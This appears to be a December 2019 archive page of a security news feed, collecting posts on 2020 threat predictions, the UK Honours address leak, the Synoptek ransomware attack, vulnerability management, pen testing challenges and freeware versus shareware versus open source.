Monthly Archives: December 2019

Security resolutions for 2020 to stay safe online!

As we are about to enter the new year, it’s ritualistic to reflect on our experiences from the passing year and make resolutions for the New Year. Most people make resolutions around good heath, their life goals, etc. Here is a different angle to our routine resolutions’ list – Security…

Get yourself cybersecure for 2020

With ever more tech in our lives, our data is vulnerable. Here are our six top tips to keep it safe in the new year

Technology is changing our lives for the better; yet it’s also exposing us to organised crime, online scammers and hackers – and whole industries built around monetising our personal data. But you don’t have to be resigned to cyber-victimhood. Give yourself, and your devices, a security update for 2020 and start fighting back.

Hackers don’t like a liar – especially if the fibs are about the questions sites ask you as a means of identification

Continue reading...

Cyber Attacks are the Norm

By Babur Nawaz Khan, Product Marketing, A10 Networks

As we 2019, its time to have a look at the year 2020 and what it would have in store for enterprises.

Since we are in the business of securing our enterprise customers’ infrastructures, we keep a close eye on how the security and encryption landscape is changing so we can help our customers to stay one step ahead.

In 2019, ransomware made a comeback, worldwide mobile operators made aggressive strides in the transformation to 5G, and GDPR achieved its first full year of implementation and the industry saw some of the largest fines ever given for massive data breaches experienced by enterprises.

2020 will no doubt continue to bring a host of the not new, like the continued rash of DDoS attacks on government entities and cloud and gaming services, to the new and emerging. Below are just a few of the trends we see coming next year.

Ransomware will increase globally through 2020
Ransomware attacks are gaining widespread popularity because they can now be launched even against smaller players. Even a small amount of data can be used to hold an entire organisation, city or even country for ransom. The trend of attacks levied against North American cities and city governments will only continue to grow.

We will see at least three new strains of ransomware types introduced:

  • Modular or multi-leveled/layered ransomware and malware attacks will become the norm as this evasion technique becomes more prevalent. Modular attacks use multiple trojans and viruses to start the attack before the actual malware or ransomware is eventually downloaded and launched 
  • 70% of all malware attacks will use encryption to evade security measures (encrypted malware attacks)
To no surprise, the cyber security skills gap will keep on widening. As a result, security teams will struggle with creating fool-proof policies and leveraging the full potential of their security investments

Slow Adoption of new Encryption Standards
Although TLS 1.3 was ratified by the Internet Engineering Taskforce in August of 2018, we won’t see widespread or mainstream adoption: less than 10% of websites worldwide will start using TLS 1.3. TLS 1.2 will remain relevant, and therefore will remain the leading TLS version in use globally since it has not been compromised yet, it supports PFS, and the industry is generally slow when it comes to adopting new standards. Conversely, Elliptical-curve cryptology (ECC) ciphers will see more than 80% adoption as older ciphers, such as RSA ciphers, are disappearing.

Decryption: It’s not a Choice Any Longer
TLS decryption will become mainstream as more attacks leverage encryption for infection and data breaches. Since decryption remains a compute-intensive process, firewall performance degradation will remain higher than 50% and most enterprises will continue to overpay for SSL decryption due to lack of skills within the security teams. To mitigate firewall performance challenges and lack of skilled staff, enterprises will have to adopt dedicated decryption solutions as a more efficient option as next-generation firewalls (NGFWs) continue to polish their on-board decryption capabilities

Cyber attacks are indeed the new normal. Each year brings new security threats, data breaches and operational challenges, ensuing that businesses, governments and consumers have to always be on their toes. 2020 won’t be any different, particularly with the transformation to 5G mobile networks and the dramatic rise in IoT, by both consumers and businesses. The potential for massive and widespread cyber threats expands exponentially.

Let’s hope that organisations, as well as security vendors, focus on better understanding the security needs of the industry, and invest in solutions and policies that would give them a better chance at defending against the ever-evolving cyber threat landscape.

Huawei says ‘survival is our first priority’ in 2020 as western boycott bites

Chairman Eric Xu warns that hit from US sanctions means telecoms firm must ‘go all out’ to maintain sales

The embattled Chinese telecommunications company Huawei says “survival” is its first priority after announcing sales were hit hard by a boycott from western countries.

Eric Xu, the company’s chairman, said estimated sales revenue would reach 850bn yuan for 2019 (US$121bn) - up roughly 18% from the previous year, but much lower than initially expected.

Continue reading...

The United Kingdom Leaks Home Addresses of Prominent Brits

2020 seems to be getting off to an inauspicious start with the compromise of the home addresses of prominent UK citizens–many of them in lines of work that could make them targets for crime.

The UK Cabinet Office issued an apology after a data leak that involved the exact addresses (including house and apartment numbers) of more than 1,000 New Year Honours recipients. The information was posted online and visible to the public for about an hour.

January 1 is one of two days reserved for the announcement of new members of the UK’s honor system, which includes newly minted members of the Order of Chivalry as well as other distinctions. The other day for such announcements is April 21, Queen Elizabeth’s birthday.

The names and addresses of 1,097 honors recipients were published on the New Year Honours website Friday, December 27. Included on the list were recording artist Sir Elton John, former Director of Public Prosecutions Alison Saunders, and several other athletes, celebrities, and government officials.

While many of the addresses on the list were already publicly available, individuals on the list are concerned for their safety.

“It’s much more concerning for private citizens, like those who have been involved in policing or counter-terrorism or other such sensitive cases, to have their addresses published,” said former Tory leader Sir Iain Duncan Smith to the Sunday Times.

“For someone like myself in direct frontline services, it would be very worrying if those details could be shared,” said Women’s Aid regional manager Sonya McMullen, whose address was also leaked.

As reported by the BBC, in an interview on Radio 4, former head of the civil service Lord Kerslake “suggested ‘human error’ could be to blame for the leak and called on investigators to look at whether staff were given training on data regulation.”

While the incident was subsequently reported to the Information Commissioner’s Office (ICO), which has the power to levy fines when personally identifiable information is mishandled or breached, what exactly is the right punishment for a crime where a layer of security is lost–and changing residence is the only remedy?

Do the fines cover the cost of selling a home, and all the associated expenses of moving? It’s an unknowable problem set, but there is one thing we know for certain: This sort of leak is avoidable. A combination of training and preventative systems can help employees avoid such grave mistakes–systems and protocols that work even on the day after Boxing Day, when employees may not be in the best shape.

There is always another layer of protection and prevention to be had when it comes to cyber and the protection of our information, just like there is always another story about failures to protect it.



The post The United Kingdom Leaks Home Addresses of Prominent Brits appeared first on Adam Levin.

Managing cybersecurity in multimedia networks

Estimated reading time: 2 minutes

The explosion of internet speeds across the globe has led to a rapid increase in high-end streaming technology, wireless sensor networks and wearable Internet of Things (IoT) devices. Multimedia networks generate huge amounts of data flowing through multiple devices in different locations while also raising important questions about data propriety, copyright and protection. Cybersecurity has become an important component of multimedia networks looking to tackle these issues.

The urgency is precipitated by the condition of organizations which operate in this sector. A survey of cybersecurity decision-makers at US media and entertainment firms by Forrester Consulting in September 2018 found that more than half of the surveyed firms had experienced three or more cyber attacks. In April 2015, a cyberattack on renowned French international TV broadcaster TV5 Monde took 12 channels belonging to the broadcaster off the air.

Considering multimedia networks deal with the dissemination of large amounts of content in video, audio, image and other formats, these networks are open to various types of threats which target three major features of these networks:


Confidentiality is an important feature of data in multimedia networks. Access to confidential data through illegal means or unauthorized channels constitutes a major threat.


The integrity of the data contained in multimedia networks is paramount. Alteration of this data through detected or undetected means represents a major breach.


The end-users of multimedia networks expect the data they seek to be available at all times. Any disruption to this service has both a reputational and a financial consequence.

The exact kinds of threats that multimedia networks face are varied but they definitely include:

Distributed Denial of Service (DDoS) attacks

Multimedia networks are large & distributed and transmit huge amounts of data. Attackers specifically target such networks with Distributed Denial of Service (DDoS) attacks as the repercussions are immediate.

Patching vulnerabilities

Multimedia networks consist of many devices distributed mainly over different continents and countries. Such a large network means it is not always possible to ensure all devices are compliant with the recent security updates, opening up the network to vulnerabilities.

Supply chain attacks

As alluded to in the last point, the multimedia network generally has large supply chains which may not always uphold the same standards of cybersecurity. Any malware in the supply chain may spread to the main network leading to the network finding itself at risk.

Social engineering

Though awareness has increased, multimedia networks often find themselves operated by employees who do not take cybersecurity as seriously or do not understand the consequences of neglecting cybersecurity. Such employees are at high risk of social engineering attacks.

To protect against these threats, enterprises running multimedia networks can consider Seqrite’s Unified Threat Management (UTM) solution which is a complete security package of vital tools, including a UTM firewall and high-grade intrusion detection systems.

Key UTM features which keep networks safe from threats:

  • Firewall – Administrators can block traffic between internal and external networks based on compliance policies
  • Intrusion Prevention System (IPS) – Network traffic is scrutinized in real-time to forestall a broad range of DoS and DDoS attacks
  • Gateway Antivirus – Incoming and outgoing network traffic is scanned at the gateway level
  • Web Filtering – Non-business related web traffic can be blocked by administrators with the option of group-based bandwidth management

The post Managing cybersecurity in multimedia networks appeared first on Seqrite Blog.

Only Focused on Patching? You’re Not Doing Vulnerability Management

By Anthony Perridge, VP International, ThreatQuotient

When I speak to security professionals about vulnerability management, I find that there is still a lot of confusion in the market. Most people immediately think I’m referring to getting rid of the vulnerabilities in the hardware and software within their network, but vulnerability management encompasses a much broader scope.

Vulnerability management is not just vulnerability scanning, the technical task of scanning the network to get a full inventory of all software and hardware and precise versions and current vulnerabilities associated with each. Nor is it vulnerability assessment, a project with a defined start and end that includes vulnerability scanning and a report on vulnerabilities identified and recommendations for remediation. Vulnerability management is a holistic approach to vulnerabilities – an ongoing process to better manage your organisation’s vulnerabilities for the long run. This practice includes vulnerability assessment which, by definition, includes vulnerability scanning, but also other steps as described in the SANS white paper, Implementing a Vulnerability Management Process.

Just as the process of vulnerability management is broader than you might think, the definition of a vulnerability is as well. A vulnerability is the state of being exposed to the possibility of an attack. The technical vulnerabilities in your network are one component, but there is another important aspect that is often overlooked – the vulnerabilities specific to your company, industry and geography. You can’t only look internally at the state of your assets. You must also look externally at threat actors and the campaigns they are currently launching to get a more complete picture of your vulnerabilities and strengthen your security posture more effectively.

In The Art of War, Sun Tzu captured the value of this strategy well when he stated, “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Prioritise Patching Based on the Threat
As stated above, with respect to vulnerability management, most security organisations tend to focus on patching but because they don’t have the resources to patch everything quickly, they need to figure out what to patch first. To do this security teams typically take a thumbnail approach – they start with critical assets, the servers where their crown jewels are located, and work down to less critical assets. While a good starting point, their prioritisation decisions are based only on internal information. As Sun Tzu points out, knowing yourself but not the enemy will yield some victories but also defeats.

Having a platform that serves as a central repository allows you to aggregate internal threat and event data with external threat feeds and normalise that data so that it is in a usable format. By augmenting and enriching information from inside your environment with external threat intelligence about indicators, adversaries and their methods, you can map current attacks targeting your company, industry and geography to vulnerabilities in your assets. Intelligence about a campaign that presents an immediate and actual threat to your organisation leads to a more accurate assessment of priorities and may cause you to change your current patch plan to prioritise those systems that could be attacked at that moment. The result is intelligence-driven patch management that hardens your processes to thwart the attack

Bridge the Visibility Gap
Unfortunately, the reality is that not every company has 100% visibility into their assets and vulnerabilities, so mapping external threat data to internal indicators to hone a patch plan sometimes has limited value. However, there is still tremendous value in gathering information from global threat feeds and other external intelligence sources to determine if your business is under a specific attack. The MITRE ATT&CK framework is one such source. It dives deep into adversaries and their methodologies so security analysts can use that information to their advantage.

Bringing MITRE ATT&CK data into your repository allows you to start from a higher vantage point with information on adversaries and associated tactics, techniques and procedures. You can take a proactive approach, beginning with your organisation’s risk profile, mapping those risks to specific adversaries and their tactics, drilling down to techniques those adversaries are using and then investigating if these techniques could be successful or if related data have been identified in the environment. For example, you may be concerned with APT28 and can quickly answer questions including: What techniques do they apply? Have I seen potential indicators of compromise or possible related system events in my organisation? Are my endpoint technologies detecting those techniques? With answers to questions like these you can discover real threats, determine specific actions to harden your network and processes, and mitigate risk to your business.

A holistic approach to vulnerability management, that includes knowing yourself and your enemy, allows you to go beyond patching. It provides awareness and intelligence to effectively and efficiently mitigate your organisation’s risk and position your team to address other high-value activities – like detecting, containing and remediating actual attacks, and even anticipating potential threats.

Happy 10th Birthday,

Today marks the 10th anniversary of! Over the past decade, the site has featured more than 1,800 stories focusing mainly on cybercrime, computer security and user privacy concerns. And what a decade it has been.

Stories here have exposed countless scams, data breaches, cybercrooks and corporate stumbles. In the ten years since its inception, the site has attracted more than 37,000 newsletter subscribers, and nearly 100 million pageviews generated by roughly 40 million unique visitors.

Some of those 40 million visitors left more than 100,000 comments. The community that has sprung up around KrebsOnSecurity has been truly humbling and a joy to watch, and I’m eternally grateful for all your contributions.

One housekeeping note: A good chunk of the loyal readers here are understandably security- and privacy-conscious, and many block advertisements by default — including the ads displayed here.

Just a reminder that KrebsOnSecurity does not run third-party ads and has no plans to change that; all of the creatives you see on this site are hosted in-house, are purely image-based, and are vetted first by Yours Truly. Love them or hate ’em, these ads help keep the content at KrebsOnSecurity free to any and all readers. If you’re currently blocking ads here, please consider making an exception for this site.

Last but certainly not least, thank you for your readership. I couldn’t have done this without your encouragement, wisdom, tips and support. Here’s wishing you all a happy, healthy and wealthy 2020, and for another decade of stories to come.

Weekly Update 171

Weekly Update 171

Sitting down to do this one today I thought it would be brief, turns out a bit more ended up on the agenda than I expected. The GoGetSSL bit in particular was unfolding as I recorded and to their credit, they later apologised for their "rude messages" which is a good sign. I still intend to finish writing up the blog post because the issues they've raised need tackling, but as with the Sophos example I also talk about, it's good to see a bit of humility (I've certainly been there myself before). All that plus the Turkish Crime Family aftermath and the Factual data (another data aggregator) in HIBP in this week's update.

Weekly Update 171
Weekly Update 171
Weekly Update 171
Weekly Update 171


  1. Sophos got their messaging wrong on padlocks and HTTPS, but fixed it immediately once people spoke up (good on them for that effort!)
  2. GoGetSSL got their messaging wrong on SSL over and over and over and over... (more to follow on this, I'll put it in a dedicated blog post)
  3. "The Turkish Crime Family" ringleader plead guilty to blackmailing Apple (time and time again, this turns out to be kids full of bravado)
  4. Back in 2017 I wrote about how the Turkish Crime Family data was pretty suspect (basically all came from another data breach)
  5. Sponsored by Varonis, check out their free video course: 7 Hidden Office 365 Security Settings You Can Only Unlock with PowerShell

Ransomware at IT Services Provider Synoptek

Synoptek, a California business that provides cloud hosting and IT management services to more than a thousand customers nationwide, suffered a ransomware attack this week that has disrupted operations for many of its clients, according to sources. The company has reportedly paid a ransom demand in a bid to restore operations as quickly as possible.

Irvine, Calif.-based Synoptek is a managed service provider that maintains a variety of cloud-based services for more than 1,100 customers across a broad spectrum of industries, including state and local governments, financial services, healthcare, manufacturing, media, retail and software. The company has nearly a thousand employees and brought in more than $100 million in revenue in the past year, according to their Web site.

A now-deleted Tweet from Synoptek on Dec. 20 warned against the dangers of phishing-based cyberattacks, less than three days prior to their (apparently phishing-based) Sodinokibi ransomware infestation.

News of the incident first surfaced on Reddit, which lit up on Christmas Eve with posts from people working at companies affected by the outage. The only official statement about any kind of incident came late Friday evening from the company’s Twitter page, which said that on Dec. 23 it experienced a “credential compromise which has been contained,” and that Synoptek “took immediate action and have been working diligently with customers to remediate the situation.”

Synoptek has not yet responded to multiple requests for comment. But two sources who work at the company have now confirmed their employer was hit by Sodinokibi, a potent ransomware strain also known as “rEvil” that encrypts data and demands a cryptocurrency payment in return for a digital key that unlocks access to infected systems. Those sources also say the company paid their extortionists an unverified sum in exchange for decryption keys.

Sources also confirm that both the State of California and the U.S. Department of Homeland Security have been reaching out to state and local entities potentially affected by the attack. One Synoptek customer briefed on the attack who asked to remain anonymous said that once inside Synoptek’s systems, the intruders used a remote management tool to install the ransomware on client systems.

Much like other ransomware gangs operating today, the crooks behind Sodiniokibi seem to focus on targeting IT providers. And it’s not hard to see why: With each passing day of an attack, customers affected by it vent their anger and frustration on social media, which places increased pressure on the provider to simply pay up.

A Sodinokibi attack earlier this month on Colorado-based IT services firm Complete Technology Solutions resulted in ransomware being installed on computers at more than 100 dentistry practices that relied on the company. In August, Wisconsin-based IT provider PerCSoft was hit by Sodinokibi, causing outages for more than 400 clients.

To put added pressure on victims to negotiate payment, the purveyors of Sodinokibi recently stated that they plan to publish data stolen from companies infected with their malware who elect to rebuild their operations instead of paying the ransom.

In addition, the group behind the Maze Ransomware malware strain recently began following through on a similar threat, erecting a site on the public Internet that lists victims by name and includes samples of sensitive documents stolen from victims who have opted not to pay. When the site was first set up on Dec. 14, it listed just eight victims; as of today, there are more than two dozen companies named.

Three Challenges of Pen Testing


There is no arguing that a penetration test can be an invaluable exercise to evaluate the security of an IT infrastructure. Despite the necessity for these critical evaluations, many security teams struggle to maximize the effectiveness of pen tests in their organization. What are the top challenges that organizations are looking at today when facing an upcoming pen test? Read on to find out.

1. The Importance of Scope and Clear Rules of Engagement

While conducting a pen test is an involved process, some of the most critical work comes before testing ever begins. The scoping stage can determine the success of the entire process. With so many different things to test, as well as a variety of ways to test them, it’s difficult to limit yourself. So many options, as well as differing perspectives on what are the highest priorities, can result in scope creep. It’s easy to end up with a wide scope that tries to cover a little bit of everything. But a scope that is too broad may not end up producing as much valuable information, since pen testers typically won’t be able to do an in depth evaluation. 

When developing your scope, it’s helpful to consider not just your devices, applications, and networks, but overarching goals and priorities that you want from your pen test. You can also talk with the pen testers to help establish reasonable, firm parameters that will still provide valuable insights.

Rules should also be set around the more specific details of executing a pen test. You’ll want to be clear on not just what you want, but what you don’t want. Do you want an internal or external test? Is it permissible to handle sensitive data? Do you want to inform employees the test is going on? You don’t want to set off alarms unless that’s the goal of the test—which should be established well ahead of the test taking place. On what date and at what time will this occur? Establishing clear rules of engagement ensures that testing goes smoothly, without network disruptions or misunderstandings.

2. Working Around Resource Constraints

Though limited resources are a problem in many areas, cybersecurity faces an especially severe shortage in skilled workers. One of the top challenges in cybersecurity today, let alone pen testing, is finding people with the necessary skill sets to face these ever-growing threats. In fact, according to the Center for Strategic and International Studies (CSIO), the number of unfilled cybersecurity jobs has grown by more than 50 percent since 2015. Since the cybersecurity skills shortage clearly can’t be solved overnight, what can be done?

One approach is to focus on making the limited amount of skilled pen testers as productive as possible. This means ensuring that they are not wasting their time on mundane, repetitive tasks. Utilizing pen testing tools, like Core Impact, can automate these tasks, like collecting information about networks or hosts. Additionally, one of the most time-consuming aspects of pen testing is creating a final report. Testers often have to gather all of the data and manually compile the results. Using a tool like Core Impact keeps track of a pen testers activities and can auto generate reports, dramatically increasing efficiency.

Another approach, which can work well in tandem with the first, is to emphasize on the job training for new or junior pen testers. Even though they haven’t built up a robust skill set, they can still hit the ground running in several ways. Oftentimes, less experienced pen testers assist with more of the monotonous work to help free up the time of advanced pen testers. However, they can also help with more advanced tasks that improve their training. Pen testing tools, as mentioned earlier, can help speed up or automate some of the more tedious tasks. More complex work can be simplified through the use of GUI interfaces and wizards, so knowledge of command line isn’t necessary. Core Impact, for example,  has wizards for all their Rapid Penetration Tests (RPTs) for network and web applications. By streamlining the tasks of both advanced and junior testers, along with the assistance of tools, pen testing teams can not only get through a resource drought, they can even learn how to do more with less.

Not only this, the cybersecurity specialists that do exist are in a constant race against time. The longer malware lingers in your environment, the more damage it will do. The longer a security weakness is left unremedied, the more likely an attacker will exploit it.

3. Intelligent Advancements Without Shared Knowledge

The world of pen testing can be an interesting balance of open collaboration and closely guarded privacy. While different groups may engage in teaming exercises, or happily talk technique when they attend Black Hat, most pen testers are extremely reluctant when it comes to publishing information online, particularly details of how they’ve been successful in getting around defenses.

One reason for this is that pen testing teams may not want their methods known. There is no magic formula for pen testing—each environment is different and requires a combination of skills, tools, and creative thinking. Pen testers and pen testing teams discover and develop unique techniques and methods that they may prefer to keep quiet so they can have effective means of carrying out their assigned tasks. The dominant reason for not publishing information is that it creates a security hazard that can affect anybody with an internet connection. While pen testers are using the knowledge of how to evade barriers for the sake of improving security, there is no guarantee and whoever reads it is a pen tester and not a threat actor. These malicious parties would happily use this to get into a system and wreak havoc.

This leaves the challenge of how to stay up to date when pen testers can’t widely share information. Investing in enterprise pen testing tools like Core Impact can often provide a new knowledge base that is regularly updated with new tactics as well as exploits to take advantage of new vulnerabilities that have been published. Ultimately, it’s important to keep in mind that what works today, may not work tomorrow. Even if there were more outside sources, you would want to keep trying new techniques, innovating, and utilizing the latest resources in order to stay not just up to date, but hopefully one step ahead of attackers.




challenges of pen testing
Penetration testing
Big text: 
Resource type: 
Ready to learn some new pen testing techniques?

Get expert advice on strategies to use throughout the process of creating a social engineering campaign by enrolling in our Best Practices for Effective Phishing Simulations eCourse.

Freeware vs. Shareware vs. Open Source – What is Each and How to Use Them Safely

During the last decade or so, software deployment for both SMBs and enterprise has become rather problematic – not so much on the upscaling part, but rather on the number of licenses an institution has to purchase and renew. The costs can be ginormous, which is the very reason why the company owner resorts to cost-effective alternatives such as freeware, shareware, and open-source. In this article, I’m going to run you through each category. After that, you can decide which is better for your business.  Let’s get to it – freeware vs. shareware vs. open source. Who will win the race?

What is Freeware?

Loosely defined as a type of proprietary software, that it’s being distributed at no cost whatsoever for the user, freeware is the answer to accomplishing very simple tasks without the need of investing in expensive, license-based software. Freeware software has no EULA, license, or rights of any kind, which means that it can be deployed on both home and enterprise machines.

Freeware is not a modern concoction. In fact, the term itself was coined in the golden 80s by Andrew Fluegelman, who sough of means of making PC-Talk (Skype’s long-forgotten ancestors) available outside regular distribution channels. The key differentiator between freeware, shareware, and open-source is that freeware does not make its source code available, despite being free of charge.

A couple of freeware examples: Discord (IM used by the gaming community), Yahoo Messenger (rest in peace, my friend), µTorrent, IrfanView, Groove Music, Winamp, DVD Shrink, CCleaner, and others.

Freeware pros:

  • Easy to use and deploy (for home users and enterprises\SMBs).
  • A great way to incentivize your potential customers (for soft makers and marketeers gunning for paid licenses).
  • Solve daily tasks without having to invest in expensive software.
  • Quickly grow your user base.

Freeware cons:

  • Limited functionality.
  • No way of reverse-engineering it since the source code is not made available.
  • Customers may sometimes perceive the product as inferior.


What is Shareware?

Probably most of the apps found online and offline fall under this category. Shareware is so widespread that it ‘felt’ the need to have its own consortium. Called the Association of Shareware Professional or ASP, for short, this international trading and trade organization comprises over 1,500 vendors, authors, and online retailers. The term was coined around the same time as freeware.

While Fluegelman was pushing his PC-Talk comm app. Jim “Button” Knopf, an IBM employee at that time, was releasing a database program called PC-File. In legal terms, the main difference between Knopf’s apps and Fluegelman’s freebie is that the database program was never meant to be offered free of charge.

Knopf himself called his creation “user-supported software” meaning that users would need to cover some of the fees associated with the continual development of the product. No doubt, an interesting marketing praxis, but a lucrative one, given shareware’s popularity and availability.

Shareware is an umbrella term, encompassing various types of apps, each following a unique business model.

Types of shareware

1. Adware

Also called “advertising-supported software”, this type of shareware has embedded ads running alongside the apps. The purpose of adware is to generate revenue for its creator. Ads may be present during the installation process or as part of the user interface. Most are ‘hardwired’ to analyze the users’ traffic in order to display customized ads. Adware is free-to-use, but the sheer number of ads can interfere with normal operation. A large number of apps currently available on Google Play are adware.

2. Crippleware

It may sound like a new form of malware, but it’s actually a legit type of software. Why is it called “Crippleware”? Because the author purposely “cripples” the app’s vital functions, making them available in the paid or premium version. For instance, if you have photo-editing apps, the download as jpeg function may be disabled or the photos may have watermarks that can be removed by upgrading to full.

3. Trialware

Trialware apps can be used for a limited period.  In most cases, users will be granted access to all of the app’s functions (including the ones available in the paid version). However, once the trial period expires, the app will be disabled or revert to a very basic (and very unusable version). From my experience, trialware that doesn’t cover vital system processes (i.e. antivirus or malware-scanner), will simply stop working. They will, of course, display a splash screen meant to inform the user that the software has expired and that he must upgrade to full.

4. Donationware

The software grants the user access to all of its features. However, it does come with one small request: the user is asked to shell out a small amount of cash to support the project or just show appreciation for the author’s work. The payout part is optional, having no bearing of the app’s functionality. Given its behavior, one could consider that donationware has more in common with freeware than with shareware.

5. Nagware

Pejorative in nature, the term “nagware” describes a software category that reminds users via on-screen messages that their licenses are about to expire and that they should upgrade to the full version. In most cases, the nags will continue well after the trial period is over. The functionality will be reduced, the user having access only to basic functions.

6. Freemium

A portmanteau term (“free” + “premium”) describing a type of software that ‘withholds’ advanced features, making them available in the premium version. The free version is fully functional. Nags are rare, but users might receive ads from time to time regarding the advantages of the premium versions.

Shareware pros:

  • Free to use.
  • Powerful feature. Great for getting a one-time task done.
  • Donationware is just as good as any license-based application.
  • Diversity and abundance.
  • Most of them are cross-platformers.

Shareware cons:

  • Some legal issues may arise if deployed on enterprise machines.
  • Poor compatibility with newer operating systems.
  • Ads and nags can become annoying.
  • Shareware doesn’t benefit from regular security and functionality updates as licensed software.

One last thing to mention – neither freeware nor shareware authors don’t make the software code available for studying or altering. Which brings us to the third software category: open-source.

What is Open-Source?

Open-source software or OSS is a type of software in which the author releases the source code. Furthermore, as far as the copyright is concerned, whoever holds the software’s license can distribute, study or alter the source code. Enterprises would often turn to open-source solutions since they’re much easier to customize compared to licensed software.

The best example of OSS I can think of is VLC player, one of the most popular video players available online. That’s on the consumer side.

As for enterprises and SMBs, there are a number of open-source software that successfully replaced their license-based counterparts: OpernCart (online shopping platform), SuiteCRM (useful for managing customer info), Helpy (self-service support), Mailman (management tool for email lists), WordPress (blogging), Daawarpper (data visualization), Gimp (powerful image editor), LibreOffice (perfect and free alternative to Microsoft Office), and the list goes on.

Open-source software pros:

  • Free and cheaper compared to (paid) license-based products.
  • Modable, reliable, and easy to use.
  • Safer from a cybersecurity standpoint compared to free and even some license-based products.
  • Very flexible. It can be used beyond its intended purpose (you’re going to need a talented backend hand for that).

Open-source software cons:

  • It can incur some long-term (and unforeseeable) costs. Any issues that arise have to be dealt with by yourself or your dev team. This usually happens when the software has been outstretched or altered more than necessary. Doing in-house patching and/or repair points to another con: no support for the product. So, if something goes wrong, you’re on your own.
  • Less-than-friendly UI. It will also take you a while to learn the product.


Freeware vs. Shareware

Now that we’ve got the basics in place, let’s take a closer look at the first contenders: freeware vs. shareware.

First of all, I think it’s important to see which category the two of them address. We can agree (to disagree) that both types of software can be used on home and work machines alike. As someone who didn’t have a lot of money to spend on software, I can wholeheartedly say that freeware is what dreams are made of – imagine what it would have meant to buy a Photoshop license just to tweak some family photos or to pull a plank on your roommate.

Game streaming – for those of you familiar with the concept, the costs alone can make your head spin, that is if you want to go pro. Still, even the basics can cost a pretty penny. Luckily you can accomplish basic tasks like screen or voice recording with some very nice (and free) online tools.

Things change a bit when it comes to deploying freeware on enterprise machines. Of course, some shareware can handle some of the routine tasks. For instance, ePrompter is a great and hassle-free alternative to Microsoft Outlook or some other desktop-based email management tool. Even TeamViewer, the (over)glorified remote computer control tool is free and can be used to accomplish very simple tasks.

Other honorable mentions: Discord (great alternative to Teams, Skype for business, and even WhatsApp), B1 Free Archiver (if you really don’t want to buy WinRAR), Recuva (powerful data recovery application), CCleaner (registry cleaner), Foxit Reader (open and print pdf files), and Microsoft Visual Studio Express (supports multiple IDEs, pitch-perfect for web designers).

Indeed, they are very powerful tools, but, in my opinion, simply not enough to meet the needs of a bustling enterprise. It all boils down to statistics: the bigger the database, the likelier it is to find a solution (or more) to suit your needs.

Why shareware? There are literally thousands of apps, available both online and offline, some of them just as good, if not better than license-based software. One thing about shareware – it’s a short-term solution.

Basically, it’s your ‘emergency-only’ kit: problem – shareware – problem solved. This type of software wasn’t designed for long-term use. As I pointed out in the section about shareware, most have some kind of built-in ‘safety’ to prevent users from doing just that; except for donationware, of course. There’s also the matter of overexposing your machine(s) to malicious content. I will cover this in the last section of the article.

The main reason why shareware is better than freeware for enterprise needs – evergreen(ess). Most freeware is outdated, meaning that they may not even run properly on Windows 10 machines. If you also add the fact that they are unpatched, you’ve got yourself a major cybersecurity vulnerability. Last, but not least, to my knowledge, few freeware support platforms other than Microsoft Windows. So, if you need to deploy freeware on a machine running Linux or macOS, you’re in for a world of pain.

Winner – shareware. Hassle-free, tons of content, suitable for any kind of needs, be them home- or enterprise-related.

Shareware vs. open-source

Clearly, shareware is the better alternative to freeware, but how does it fare against open-source software. Clearly, the latter category holds the high ground here. Why? Because, as the name suggests, the source code is made available, which means that a talented backend hand can easily customize it. But, will it prove to be a match for shareware’s availability and ‘widespreadness’?

It could and it does. Open-source software is definitely getting a lot of attention and for a very good reason – even though OSS is free, it’s extremely reliable and tends to take quite a beating when subjected to repeated reverse-engineering. And, on top of that, OSS software, compared to freeware and shareware, is much more secure.

Open-source software is amazing simply because it’s out there and can potentially be molded into anything you like. However, it’s not the Holy Grail of enterprise software, nor does it want to be. OSS is scalable, dependable, and, in all cases, it’s made by an experienced computer engineer who isn’t necessarily motivated by money. Don’t get me wrong – shareware-type software is also developed by experienced people, but on the sample-now-buy-full-later basis.

As an enterprise, you should also consider the support aspect. If something goes terribly wrong with the software, there’s no one out there to help.

Well, that’s entirely correct; there’s an entire community out there of experts willing to give you a helping hand, but that means hours upon hours of digging through forums, asking questions and praying for someone to come up with the right answer. This perspective is not exactly compatible with an enterprise’s credo.

So, do we have a winner here? It would say that it’s a tie: open-source is dependable, flexible, and scalable, but low on support and could incur unforeseen costs, especially when you try to use for purposes other than it was designed for. On the other hand, shareware holds an abundant database but falls back as far as a long-term commitment.

Freeware vs. shareware vs open source

Now that we have all the pieces of the puzzle, it’s easier to figure out which is the best enterprise-grade solution.

Let’s start with freeware.

Major advantages – it’s free, easy to install, and can solve any number of issues. On the other hand, disadvantages wise, the freeware pool is very limited and can only address a handful of issues. Freeware would best be used on home machines. Take that and its questionable compatibility, no support of any kind, and the fact that most of them are obsolete, it’s safe to assume that freeware and enterprises just don’t mix.

Shareware – an entire database, laid down at your feet. Plenty of possibilities, but is shareware the answer to your company’s needs? It’s just a matter of how you look upon the problem: if it’s a one-time thing, then you should definitely consider deploying software on a couple of machines.

There’s no need to concern yourself with the trial period, as long as you can solve the task or tasks in one go. Just bear in mind that some apps will revert to basic functions or stop working altogether after a certain number of uses. Of course, if the app suits your needs, you can always activate the full version by buying the license.

Open-source – dependable, can easily be taken apart by any IDE, and free to use. Do take in mind that OSS can come with hidden costs and it’s harder to get used to it compared to shareware or license-based software. If you encounter issues along the way, you can always ask the dev community for help. Just don’t expect the answer to be prompt as in the case of an app that offers round-the-clock support.

In the end, it’s all up to you to decide which one clicks with your company’s needs.

Cybersecurity issues and safety tips

Tackling non-licensed-based software should come with a warning label. Up next, I’ll be discussing the risk of using shareware, freeware, and open-source software. I will also include some cybersecurity tips along the way.

1. Adware also means malware

If you plan on using shareware, pay extra attention to apps that use ads-generated revenue. Some of them may contain links to malicious websites that could seriously harm your machine. Best to check the security certificate after clicking on an ad, though I advise you not to.

2. Fake apps

Some applications advertised as freeware could be fake. Don’t download the first app you find on Google. Take your time and do some research. You would do well to stay away from websites that use too many CTAs and “free download” buttons. It’s like playing Russian Roulette with your personal data.

3. Freeware used as a malware entry point

As you know, outdated and unpatched software can be used by malicious hackers to circumvent your antivirus\antimalware solution. Since freeware does not receive regular security patches, it can become an entry point for malware.

4. Strengthen your cyber-defenses

